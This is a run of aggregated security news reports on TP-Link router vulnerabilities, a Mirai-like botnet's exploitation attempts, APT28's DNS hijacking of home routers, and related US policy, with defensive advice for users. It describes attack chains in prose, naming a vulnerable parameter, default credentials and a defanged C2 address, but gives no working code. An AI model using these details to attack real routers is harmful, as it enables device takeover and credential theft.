Hackers have targeted CVE-2023-33538 flaw in old TP-Link routers for a year, but no successful exploitation has been seen so far.

Hackers have been trying for over a year to exploit a serious flaw, tracked as CVE-2023-33538 (CVSS score of 8.8), in outdated TP-Link routers, but so far without success.

The vulnerability is a command injection vulnerability in the /userRpm/WlanNetworkRpm component that impacts several TP-Link router models (TL-TL-WR940N v2 and v4, TL-WR740N v1 and v2, and TL-WR841N v8 and v10 router models).

CISA added the issue to the KeV catalog in June 2025 and ordered federal agencies to fix the vulnerabilities by July 7, 2025.

CVE-2023-33538, disclosed in June 2023, lies in the /userRpm/WlanNetworkRpm endpoint, where the ssid1 parameter is not properly sanitized. Attackers can exploit this via crafted HTTP requests to inject commands and potentially execute arbitrary code on the device. Proof-of-concept exploits were briefly shared online and remain accessible through web archives.

“Our telemetry systems detected active, large-scale exploitation attempts for CVE-2023-33538 around the time of the addition to the KEV catalog in June 2025.” reads the advisory published by Palo Alto Networks. “We observed multiple exploitation attempts”

The researchers observed attackers sending HTTP GET requests to the /userRpm/WlanNetworkRpm.htm endpoint, trying to abuse the ssid parameter to run multiple commands. They first downloaded a malicious ELF binary named arm7 from a remote server into /tmp, then changed its permissions to make it executable, and finally ran it with a specific argument.

The activity resembles botnet behavior, often linked to Mirai-like malware. The requests also used Basic Authentication with the default credentials admin:admin, encoded in Base64.

“The arm7 binary found in our telemetry appears to be a Mirai variant. It is similar to the one used in the Condi IoT botnet, with multiple examples of the string condi in the file’s code.” continues the report.

The arm7 bot binary connects to its C2 server and listens for commands sent through a network socket. It stores incoming data in a buffer and checks it for specific byte patterns that act as instructions.

Each pattern triggers a different action. The malware can reply with a status message, start or stop operations, activate a lockdown mode, or launch an embedded HTTP server. It can also download updated malware versions depending on the command received.

When an update is triggered, the binary calls an internal update function that removes old files, contacts a hard-coded C2 server (51.38.137[.]113), and downloads fresh binaries for multiple CPU architectures. The malware cycles through several variants to stay compatible with different devices.

The C2 infrastructure is tied to a known malicious host also linked to Mirai-like botnet activity.

If instructed, the malware turns the infected device into a web server. It randomly selects a port, starts an HTTP service, and listens for connections. In this mode, it can distribute malware binaries to other infected devices, helping the botnet spread.

Overall, arm7 acts both as a command-driven bot and a distribution node, constantly updating itself and helping propagate the malware across new systems.

Palo Alto Networks published a detailed analysis of the exploit for CVE-2023-33538 on a TP-Link router to better understand the reason for the failure.

The vulnerability sits in the router’s web interface, specifically in how it handles the ssid1 parameter from the /userRpm/WlanNetworkRpm.htm endpoint. When the system processes this input, it does not clean or validate it properly. That mistake allows an attacker to inject system commands that later get passed to a shell and executed.

The execution flow is long but simple in idea. The router takes the HTTP request, extracts the SSID value, stores it in configuration structures, and compares it with previous settings. When it detects changes, it builds a system command like iwconfig and inserts the SSID value directly into it. The system then runs this command through a shell, which opens the door for code execution.

The experts reproduced the issue by emulating the firmware and logging into the router’s admin panel. They also found that the device requires authentication, so attackers cannot exploit it without valid credentials. The system uses default or weak login setups in many cases, which increases the risk.

Palo Alto Networks also saw important limitations in the environment. The router runs a restricted BusyBox shell with very few tools, so attackers cannot easily download or run advanced utilities. This limits the impact of the exploit in practice.

In summary, the vulnerability is real and allows command injection through ssid1, but successful attacks depend on authentication and the very limited system environment.

“Neither the public PoC for CVE-2023-33538 nor the attack attempts observed in our telemetry would successfully compromise the TP-Link router environment we analyzed. However, our deep dive into the firmware and its emulation reveals a significant gap between the theoretical vulnerability and its practical, real-world application.” concludes the report.

“The attacks seen in the wild were flawed on multiple levels:

• They were unauthenticated
• They targeted the incorrect parameter (ssid instead of ssid1)
• They relied on the wget utility, which is not present in the firmware’s limited BusyBox environment

This demonstrates a common attack pattern of scanning and probing with incomplete or inaccurate exploit code, resulting in noisy but ultimately ineffective attacks.”

Follow me on Twitter: @securityaffairs and Facebook and Mastodon

Pierluigi Paganini

(SecurityAffairs – hacking, TP-Link)

The post TP-Link Archer AX53 Hit by Multiple High-Severity Vulnerabilities appeared first on Daily CyberSecurity.

British security officials found that a group linked to the Russian military is spying on users of compromised Small Office/Home Office (SOHO) routers in a broad cyber espionage campaign. A Microsoft blog goes into the technical details of these attacks.

The group, which we’ll refer to as APT28, but is also known under names like Fancy Bear, BlueDelta, and Forest Blizzard, changes the DNS settings of compromised routers so their traffic is sent through servers under their control, which enables APT28 to spy on users.

The domain name system (DNS) is the way that internet domain names are located and translated into Internet Protocol (IP) addresses. Devices usually get network settings from routers using Dynamic Host Configuration Protocol (DHCP).

If an attacker can tamper with the router’s DNS settings, they can silently steer traffic through infrastructure they control, harvest login details, and in some cases position themselves between the user and the real service. This is why the campaign can support credential theft and even targeted interception of Microsoft 365 and other cloud traffic.

An FBI public service announcement says that APT28:

“…has harvested passwords, authentication tokens, and sensitive information including emails and web browsing information normally protected by secure socket layer (SSL) and transport layer security (TLS) encryption.”

The FBI says the group cast a wide net over US and globally, before narrowing down their victims to those with access to information related to military, government, and critical infrastructure.

The NCSC advisory singles out a single model of TP-Link (WR841N) with a known vulnerability that enables an unauthenticated attacker to obtain information such as usernames and passwords via specially crafted HTTP GET requests. This router model is widely sold to consumers and small businesses and not typically used as standard equipment by major internet service providers. The article also includes a long but not exhaustive list of other TP-Link router models targeted by APT28.

Microsoft Threat Intelligence says it has identified over 200 organizations and 5,000 consumer devices impacted by Forest Blizzard’s malicious DNS infrastructure.

The router ban debate

A few weeks ago, we commented on the FCC’s decision to effectively stop foreign-made routers from being imported unless their manufacturers obtain an exemption, due to what the FCC called an “unacceptable risk to the national security of the United States or the safety and security of United States persons.”

APT28’s actions show the kind of risk the FCC is trying to stop, but they also reinforce our point: while the debate over router bans and supply-chain restrictions often focuses on national origin, the bigger issue is whether the devices are secure in practice. If a router ships with weak defaults, poor update support, or a confusing setup process, it becomes a target regardless of where it was made. Attackers do not need perfection. They only need enough exposed devices to build a large, quiet infrastructure for spying and redirection.

What you can do

To check whether your settings are OK, we can only give general directions since they are sometimes very device-specific. But this method usually works:

How to check that your router’s DHCP settings match what your ISP intends:

1. Check your current DHCP information on a device.
   On a PC or phone connected to your home network, open the network details and note the IP address, subnet mask, default gateway, and DNS servers your device is using.
2. Log in to your router and find its WAN/Internet settings.
   In the router’s web interface, look at the “Status” or “Internet” page to see what address it has received from the ISP, and which DNS servers it is configured to use.
3. Compare against what your ISP documents or tells you.
   Check your ISP’s support pages or contact support to confirm what they expect: whether your connection should use DHCP or PPPoE, what range your public IP should come from, and which DNS servers they normally provide. Large mismatches (for example, DNS servers in a different country or from an unknown organization) are a reason to investigate further.
4. If you use custom DNS, document it.
   If you deliberately use alternative DNS (for example, a privacy or security resolver), write that down and periodically re‑check that your router and clients are still using the addresses you chose.

Other measures

If you can afford it and haven’t already, upgrade to Wi-Fi 7 to help future-proof your setup while current models are still in stores.

You should at least:

• Change your router’s default usernames and passwords to something less easy to guess.
• Check the vendor’s website for updates and confirm the EOL date and update to the latest firmware versions.
• Disable remote management interfaces from the Internet where possible.
• All users should carefully consider certificate warnings in web browsers and email clients because they indicate something is wrong with the secure connection and could mean you are not talking to the genuine site.

For technically confident users, replacing vendor firmware with open-source alternatives like OpenWrt or DD-WRT can extend a router’s secure lifespan. But this comes with risks, including voiding warranties or potentially bricking your device. You should only do this, or have it done, if you’re comfortable troubleshooting.

If a US citizen suspects they have been targeted or compromised by a Russian cyberintrusion, they are asked to report the activity to their local FBI field office or file a complaint with the IC3. Be sure to provide details about the affected router, including device type and DHCP configurations.

We don’t just report on privacy—we offer you the option to use it.

Privacy risks should never spread beyond a headline. Keep your online privacy yours by using Malwarebytes Privacy VPN.

The post APT28 Hijacks Home Routers to Steal Corporate Credentials appeared first on Daily CyberSecurity.

Hackers linked to Russia’s military intelligence units are using known flaws in older Internet routers to mass harvest authentication tokens from Microsoft Office users, security experts warned today. The spying campaign allowed state-backed Russian hackers to quietly siphon authentication tokens from users on more than 18,000 networks without deploying any malicious software or code.

Microsoft said in a blog post today it identified more than 200 organizations and 5,000 consumer devices that were caught up in a stealthy but remarkably simple spying network built by a Russia-backed threat actor known as “Forest Blizzard.”

How targeted DNS requests were redirected at the router. Image: Black Lotus Labs.

Also known as APT28 and Fancy Bear, Forest Blizzard is attributed to the military intelligence units within Russia’s General Staff Main Intelligence Directorate (GRU). APT 28 famously compromised the Hillary Clinton campaign, the Democratic National Committee, and the Democratic Congressional Campaign Committee in 2016 in an attempt to interfere with the U.S. presidential election.

Researchers at Black Lotus Labs, a security division of the Internet backbone provider Lumen, found that at the peak of its activity in December 2025, Forest Blizzard’s surveillance dragnet ensnared more than 18,000 Internet routers that were mostly unsupported, end-of-life routers, or else far behind on security updates. A new report from Lumen says the hackers primarily targeted government agencies—including ministries of foreign affairs, law enforcement, and third-party email providers.

Black Lotus Security Engineer Ryan English said the GRU hackers did not need to install malware on the targeted routers, which were mainly older Mikrotik and TP-Link devices marketed to the Small Office/Home Office (SOHO) market. Instead, they used known vulnerabilities to modify the Domain Name System (DNS) settings of the routers to include DNS servers controlled by the hackers.

As the U.K.’s National Cyber Security Centre (NCSC) notes in a new advisory detailing how Russian cyber actors have been compromising routers, DNS is what allows individuals to reach websites by typing familiar addresses, instead of associated IP addresses. In a DNS hijacking attack, bad actors interfere with this process to covertly send users to malicious websites designed to steal login details or other sensitive information.

English said the routers attacked by Forest Blizzard were reconfigured to use DNS servers that pointed to a handful of virtual private servers controlled by the attackers. Importantly, the attackers could then propagate their malicious DNS settings to all users on the local network, and from that point forward intercept any OAuth authentication tokens transmitted by those users.

DNS hijacking through router compromise. Image: Microsoft.

Because those tokens are typically transmitted only after the user has successfully logged in and gone through multi-factor authentication, the attackers could gain direct access to victim accounts without ever having to phish each user’s credentials and/or one-time codes.

“Everyone is looking for some sophisticated malware to drop something on your mobile devices or something,” English said. “These guys didn’t use malware. They did this in an old-school, graybeard way that isn’t really sexy but it gets the job done.”

Microsoft refers to the Forest Blizzard activity as using DNS hijacking “to support post-compromise adversary-in-the-middle (AiTM) attacks on Transport Layer Security (TLS) connections against Microsoft Outlook on the web domains.” The software giant said while targeting SOHO devices isn’t a new tactic, this is the first time Microsoft has seen Forest Blizzard using “DNS hijacking at scale to support AiTM of TLS connections after exploiting edge devices.”

Black Lotus Labs engineer Danny Adamitis said it will be interesting to see how Forest Blizzard reacts to today’s flurry of attention to their espionage operation, noting that the group immediately switched up its tactics in response to a similar NCSC report (PDF) in August 2025. At the time, Forest Blizzard was using malware to control a far more targeted and smaller group of compromised routers. But Adamitis said the day after the NCSC report, the group quickly ditched the malware approach in favor of mass-altering the DNS settings on thousands of vulnerable routers.

“Before the last NCSC report came out they used this capability in very limited instances,” Adamitis told KrebsOnSecurity. “After the report was released they implemented the capability in a more systemic fashion and used it to target everything that was vulnerable.”

TP-Link was among the router makers facing a complete ban in the United States. But on March 23, the U.S. Federal Communications Commission (FCC) took a much broader approach, announcing it would no longer certify consumer-grade Internet routers that are produced outside of the United States.

The FCC warned that foreign-made routers had become an untenable national security threat, and that poorly-secured routers present “a severe cybersecurity risk that could be leveraged to immediately and severely disrupt U.S. critical infrastructure and directly harm U.S. persons.”

Experts have countered that few new consumer-grade routers would be available for purchase under this new FCC policy (besides maybe Musk’s Starlink satellite Internet routers, which are produced in Texas). The FCC says router makers can apply for a special “conditional approval” from the Department of War or Department of Homeland Security, and that the new policy does not affect any previously-purchased consumer-grade routers.

The post Smart Home Alert: Critical Flaws Exposed in TP-Link Tapo Security Cameras appeared first on Daily CyberSecurity.

TP-Link patched high-severity Archer NX router flaws, including one that could let attackers upload rogue firmware without authentication.

The post TP-Link Fixes Bug That Lets Hackers Take Over Routers Without a Password appeared first on TechRepublic.

TP-Link patched a high severity flaw (CVE-2025-15517) in Archer NX routers that could let attackers bypass authentication and install malicious firmware.

TP-Link issued security updates for its Archer NX router series to fix multiple vulnerabilities, including CVE-2025-15517 (CVSS score of 8.6), a critical authentication bypass flaw. The vulnerability impacts multiple models, including NX200, NX210, NX500, and NX600. The flaw allows attackers to upload new firmware without privileges, creating a high risk of compromise if unpatched.

“A missing authentication check in the HTTP server to certain cgi endpoints allows unauthenticated access intended for authenticated users.” reads the advisory. “An attacker may perform privileged HTTP actions without authentication, including firmware upload and configuration operations.”

TP-Link also removed a hardcoded cryptographic key in Configuration Encryption Mechanism, tracked as CVE-2025-15605 (CVSS score of 8.5). The vulnerability allowed authenticated attackers to decrypt configuration files, modify them, and re-encrypt them.

“A hardcoded cryptographic key within its configuration mechanism enables decryption and re-encryption of device configuration data.” reads the advisory. “An authenticated attacker may decrypt configuration files, modify them and re-encrypt them, affecting confidentiality and integrity of device configuration data.”

Below is the list of impacted products/versions and related fixes:

The vendor urges customers to download and install the latest firmware version to address these issues.

In September 2025, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) added TP-Link Archer C7(EU) and TL-WR841N flaws to its Known Exploited Vulnerabilities (KEV) catalog.

Below are the descriptions for these flaws:

• CVE-2025-9377 (CVSS score of 8.6) TP-Link Archer C7(EU) and TL-WR841N/ND(MS) OS Command Injection Vulnerability
• CVE-2023-50224 (CVSS score of 6.5) TP-Link TL-WR841N Authentication Bypass by Spoofing Vulnerability

This week, the U.S. FCC announced a ban on importing new foreign-made consumer routers, citing unacceptable cyber and national security risks. The decision, backed by Executive Branch assessments, means such devices can no longer be sold or marketed in the U.S. unless they receive special approval.

Routers will be added to the Covered List, with exceptions only for those cleared by the Department of Homeland Security or defense authorities after the Department of Homeland Security or defense authorities verify they pose no threat to communications networks.

Follow me on Twitter: @securityaffairs and Facebook and Mastodon

Pierluigi Paganini

(SecurityAffairs – hacking, Archer NX)